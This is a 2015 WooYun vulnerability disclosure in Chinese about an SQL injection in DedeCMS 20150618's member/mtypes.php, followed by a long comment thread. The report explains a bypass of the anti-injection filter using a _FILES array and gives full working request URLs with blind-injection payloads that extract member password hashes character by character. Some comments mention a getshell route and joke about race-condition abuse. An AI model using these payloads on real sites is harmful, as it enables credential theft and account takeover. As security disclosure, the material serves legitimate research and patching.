Dedecms 20150618 注入一枚(过防注入\可注入管理员账户)

漏洞概要

缺陷编号:WooYun-2015-0127787

漏洞标题:Dedecms 20150618 注入一枚(过防注入\可注入管理员账户)

相关厂商:DedeCMS

漏洞作者:′雨。

提交时间:2015-07-20 09:17

公开时间:2015-10-23 09:19

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

Tags标签:

漏洞详情

披露状态:

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-25: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-09-18: 细节向核心白帽子及相关领域专家公开
2015-09-28: 细节向普通白帽子公开
2015-10-08: 细节向实习白帽子公开
2015-10-23: 细节向公众公开

简要描述:

终于绕过你,还好我没放弃。当然得感谢ooxx牛, @NoxxxP.S:http://www.dedecms.com/ 叼叼的。
gpc限制

详细说明:

首先来看一下

member/mtypes.php

所以首先我们注册一个账户, 然后传递一个数组 因为dede是伪全局然后发现并没办法直接传递数组 直接mtypename[aa'] 发现dump出来就是一个Array导致了循环出来的key就是A。 这里要另外一种方法, 参照menmen519传递数组的方法。

利用_FILES来创造一个数组。然后有一个问题就是他的防注入, 发现他的防注入又改了。。

比之前的又添加了双引号, 然后都知道80sec的ids 在'后的关键字就能过。但是没有了@ 和 " 我们怎么让在我们嵌入的select之前让'不报错。没有了思路,果断先写个渣脚本fuzz跑一下。

发现只跑出来了 @ 继续改一下脚本再跑

发现又只跑出来了一个 双引号。。 恰巧这两个又被过滤了。还好这时候ooxx牛在。WHERE mtypeid='a' and '..mtypeid and这种也能执行 所以成功绕过了dedecms的防注入。所以就可注入了。_______________________________________________________________________演示一下流程首先一个会员 来到 /member/mtypes.php 创建一个分类

这里先记下分类的ID为1 名称为 www然后访问http://web/new/dedecmsv/member/mtypes.php?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name][a' and '..mtypeid or if(ascii(substr((select pwd from dede_member limit 1),1,1))%3d51,1,0) and mtypeid%3d1%23]=w&_FILES[mtypename][size]=.xxxx

发现分类名称没有改变再改一下http://web/new/dedecmsv/member/mtypes.php?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name][a' and '..mtypeid or if(ascii(substr((select pwd from dede_member limit 1),1,1))%3d50,1,0) and mtypeid%3d1%23]=w&_FILES[mtypename][size]=.xxxx访问后 再回到分类管理来看

现在分类名称已经变成我们数组的value了 就说明 当pwd的第一位ascii码为50的时候就是true了 再转回来 说明pwd的第一位就是2也可基于时间,再写个脚本就能跑了。

漏洞证明:

修复方案:

用你们的htmlreplace

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-2309:19

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

评价

  1. 2010-01-01 00:00 玉林嘎 白帽子 | Rank:757 漏洞数:64)

    前排!!!

  2. 2010-01-01 00:00 Ton7BrEak 白帽子 | Rank:128 漏洞数:8)

    雨神叼叼的

  3. 2010-01-01 00:00 answer 白帽子 | Rank:370 漏洞数:31)

    mark

  4. 2010-01-01 00:00 二维码 白帽子 | Rank:61 漏洞数:4)

    吊吊吊!

  5. 2010-01-01 00:00 Expl0r3r 白帽子 | Rank:56 漏洞数:5)

    火前留名

  6. 2010-01-01 00:00 menmen519 白帽子 | Rank:624 漏洞数:73)

    是 主程序吗?还是附加程序 你可真快!

  7. 2010-01-01 00:00 微尘 白帽子 | Rank:144 漏洞数:29)

    前排!!!

  8. 2010-01-01 00:00 menmen519 白帽子 | Rank:624 漏洞数:73)

    刚才下载了最新的版本 貌似我在社区发的那个刷钱的还是没有改

  9. 2010-01-01 00:00 Jonsr 白帽子 | Rank:0 漏洞数:1)

    屌屌屌。

  10. 2010-01-01 00:00 xy小雨 白帽子 | Rank:136 漏洞数:19)

    23333

  11. 2010-01-01 00:00 这只猪 白帽子 | Rank:16 漏洞数:1)

    前排膜拜,坐等EXP

  12. 2010-01-01 00:00 Melody 白帽子 | Rank:0 漏洞数:0)

    前排膜拜,坐等EXP

  13. 2010-01-01 00:00 mango 白帽子 | Rank:1662 漏洞数:152)

    @Noxxx 我大师傅

  14. 2010-01-01 00:00 浅蓝 白帽子 | Rank:131 漏洞数:20)

    卧槽炸了

  15. 2010-01-01 00:00 pigzhu 白帽子 | Rank:0 漏洞数:1)

    膜拜。。

  16. 2010-01-01 00:00 scanf 白帽子 | Rank:1161 漏洞数:100)

    2333

  17. 2010-01-01 00:00 term 白帽子 | Rank:14 漏洞数:2)

    我不会告诉你 在你之前已经有大牛拿下了 可惜那个大牛是做黑产的

  18. 2010-01-01 00:00 Sunshie 白帽子 | Rank:57 漏洞数:8)

    66

  19. 2010-01-01 00:00 金枪银矛小霸王 白帽子 | Rank:93 漏洞数:8)

    火前留名

  20. 2010-01-01 00:00 CH’s Alert 白帽子 | Rank:0 漏洞数:0)

    前排观望

  21. 2010-01-01 00:00 h3hz 白帽子 | Rank:30 漏洞数:2)

    install/index.php 最新版直接getshhell

  22. 2010-01-01 00:00 phith0n 白帽子 | Rank:644 漏洞数:62)

    不知道为什么现在一点挖洞的激情都没了唉

  23. 2010-01-01 00:00 px1624 白帽子 | Rank:963 漏洞数:126)

    @phith0n 我也是

  24. 2010-01-01 00:00 小川 白帽子 | Rank:1367 漏洞数:158)

    @px1624 @phith0n 因为你们钱挣得太多,教你们个方法,在乌云控制面板里有个捐赠功能,可以去测试下数据库是否锁住了,没准并发捐赠了1块钱,实际捐赠2块钱呢。

  25. 2010-01-01 00:00 玉林嘎 白帽子 | Rank:757 漏洞数:64)

    @px1624 @phith0n 因为你们钱挣得太多,教你们个方法,在乌云控制面板里有个转账功能,可以去测试下数据库是否锁住了,没准并发转账了1wb,实际转账2wb呢。

  26. 2010-01-01 00:00 prolog 白帽子 | Rank:518 漏洞数:59)

    @px1624 @phith0n 因为你们钱挣得太多,教你们个方法,在乌云控制面板里有个转账功能,可以去测试下数据库是否锁住了,没准并发转账了1wb,实际转账2wb呢。

  27. 2010-01-01 00:00 大大灰狼 白帽子 | Rank:144 漏洞数:16)

    @phith0n 我也是

  28. 2010-01-01 00:00 sco4x0 白帽子 | Rank:6 漏洞数:2)

    @px1624 @phith0n 因为你们钱挣得太多,教你们个方法,在乌云控制面板里有个转账功能,可以去测试下数据库是否锁住了,没准并发转账了1wb,实际转账2wb呢。

  29. 2010-01-01 00:00 Snake~ 白帽子 | Rank:0 漏洞数:0)

    妈妈问我为什么跪着上乌云!

  30. 2010-01-01 00:00 脚本小伙 白帽子 | Rank:33 漏洞数:6)

    相当牛逼!

  31. 2010-01-01 00:00 Skull 白帽子 | Rank:50 漏洞数:6)

    你关注的白帽子 ′雨。 发表了漏洞 Dedecms 20150618 注入一枚(过防注入,可注入管理员账户)

  32. 2010-01-01 00:00 _Thorns 白帽子 | Rank:796 漏洞数:60)

    @phith0n @px1624 因为你们钱挣得太多,教你们个方法,在乌云控制面板里有个转账功能,可以去测试下数据库是否锁住了,没准并发转账了1wb,实际转账2wb呢。

  33. 2010-01-01 00:00 晏子 白帽子 | Rank:0 漏洞数:0)

    火钳留名。后排出售大圣归来电影票。

  34. 2010-01-01 00:00 泪雨无魂 白帽子 | Rank:11 漏洞数:1)

    牛逼啊....

  35. 2010-01-01 00:00 SunnyDoll 白帽子 | Rank:0 漏洞数:0)

    后排出售妹子.

  36. 2010-01-01 00:00 海盗湾V 白帽子 | Rank:54 漏洞数:8)

    后排出售瓜子

  37. 2010-01-01 00:00 Xenc 白帽子 | Rank:24 漏洞数:4)

    后排出售本人~ ~
    注意楼下队形

  38. 2010-01-01 00:00 忆苦思甜 白帽子 | Rank:35 漏洞数:5)

    又来了 ...

  39. 2010-01-01 00:00 Sword 白帽子 | Rank:0 漏洞数:0)

    后台坐等EXP

  40. 2010-01-01 00:00 青年 白帽子 | Rank:0 漏洞数:0)

    又要火了,坐等EXP

  41. 2010-01-01 00:00 围剿 白帽子 | Rank:5 漏洞数:2)

    坐等exp

  42. 2010-01-01 00:00 爱神 白帽子 | Rank:0 漏洞数:0)

    太牛逼了

  43. 2010-01-01 00:00 HotQS 白帽子 | Rank:0 漏洞数:0)

    雨神还是6

  44. 2010-01-01 00:00 斯杰 白帽子 | Rank:0 漏洞数:0)

    坐等exp

  45. 2010-01-01 00:00 AK-47 白帽子 | Rank:37 漏洞数:3)

    火了

  46. 2010-01-01 00:00 袋鼠妈妈 白帽子 | Rank:346 漏洞数:28)

    火!

  47. 2010-01-01 00:00 小手冰凉 白帽子 | Rank:173 漏洞数:15)

    我擦 忽略了 公开.........

  48. 2010-01-01 00:00 Ev1l 白帽子 | Rank:45 漏洞数:6)

    Mac

  49. 2010-01-01 00:00 金枪银矛小霸王 白帽子 | Rank:93 漏洞数:8)

    细节呢!?

  50. 2010-01-01 00:00 scanf 白帽子 | Rank:1161 漏洞数:100)

    通用流程 @金枪银矛小霸王

  51. 2010-01-01 00:00 紫藤居士 白帽子 | Rank:20 漏洞数:2)

    坐等公开

  52. 2010-01-01 00:00 金枪银矛小霸王 白帽子 | Rank:93 漏洞数:8)

    @scanf 额.

  53. 2010-01-01 00:00 我对网名没兴趣 白帽子 | Rank:0 漏洞数:0)

    坐等公开

  54. 2010-01-01 00:00 ../../ 白帽子 | Rank:20 漏洞数:1)

    坐等批量?

  55. 2010-01-01 00:00 色豹 白帽子 | Rank:0 漏洞数:0)

    我擦 忽略。。。。

  56. 2010-01-01 00:00 kevinchowsec 白帽子 | Rank:25 漏洞数:3)

    @phith0n 因为没挣到多少钱!

  57. 2010-01-01 00:00 明月影 白帽子 | Rank:0 漏洞数:1)

    荣耀再次回归雨牛……

  58. 2010-01-01 00:00 暴雪寒极 白帽子 | Rank:8 漏洞数:1)

    众多站长手里的织梦岌岌可危

  59. 2010-01-01 00:00 败笔 白帽子 | Rank:0 漏洞数:0)

    哇塞,快点公布.

  60. 2010-01-01 00:00 牛肉包子 白帽子 | Rank:190 漏洞数:17)

    我似乎看到了详情 23333

  61. 2010-01-01 00:00 乌云首席鉴黄师 白帽子 | Rank:0 漏洞数:0)

    目测10月底 又有一批织梦站 中枪
    顺便后排求EXP

  62. 2010-01-01 00:00 聆听 白帽子 | Rank:8 漏洞数:3)

    坐等公开

  63. 2010-01-01 00:00 Mr.杨总 白帽子 | Rank:13 漏洞数:4)

    前排坐等观看

  64. 2010-01-01 00:00 0x12 白帽子 | Rank:4 漏洞数:1)

    会火

  65. 2010-01-01 00:00 张三 白帽子 | Rank:0 漏洞数:0)

    23333333

  66. 2010-01-01 00:00 zone 白帽子 | Rank:15 漏洞数:1)

    坐等公开

  67. 2010-01-01 00:00 Q1NG 白帽子 | Rank:117 漏洞数:12)

    坐等公开!

  68. 2010-01-01 00:00 张泽大菜鸟 白帽子 | Rank:0 漏洞数:0)

    已关注,坐等漏洞公开。。。。

  69. 2010-01-01 00:00 张泽大菜鸟 白帽子 | Rank:0 漏洞数:0)

    @Snake~ 因为对这片土地爱得深沉。。

  70. 2010-01-01 00:00 黑猫 白帽子 | Rank:0 漏洞数:0)

    坐等公开

  71. 2010-01-01 00:00 YyY 白帽子 | Rank:0 漏洞数:0)

    厂商忽略了漏洞,仅向第三方合作伙伴开放....

  72. 2010-01-01 00:00 幽灵 白帽子 | Rank:38 漏洞数:4)

    雨神,敢不敢悄悄的告诉我该漏洞的详情。

  73. 2010-01-01 00:00 Jonsr 白帽子 | Rank:0 漏洞数:1)

    擦,好鸡肋!

  74. 2010-01-01 00:00 追梦人丶 白帽子 | Rank:0 漏洞数:0)

    一大波博彩牛正在袭来!

  75. 2010-01-01 00:00 Rainism 白帽子 | Rank:10 漏洞数:1)

    有亮点,学习了

  76. 2010-01-01 00:00 5t4rk 白帽子 | Rank:20 漏洞数:1)

    忽略漏洞

  77. 2010-01-01 00:00 好吃佬 白帽子 | Rank:0 漏洞数:0)

    @玉林嘎 膜拜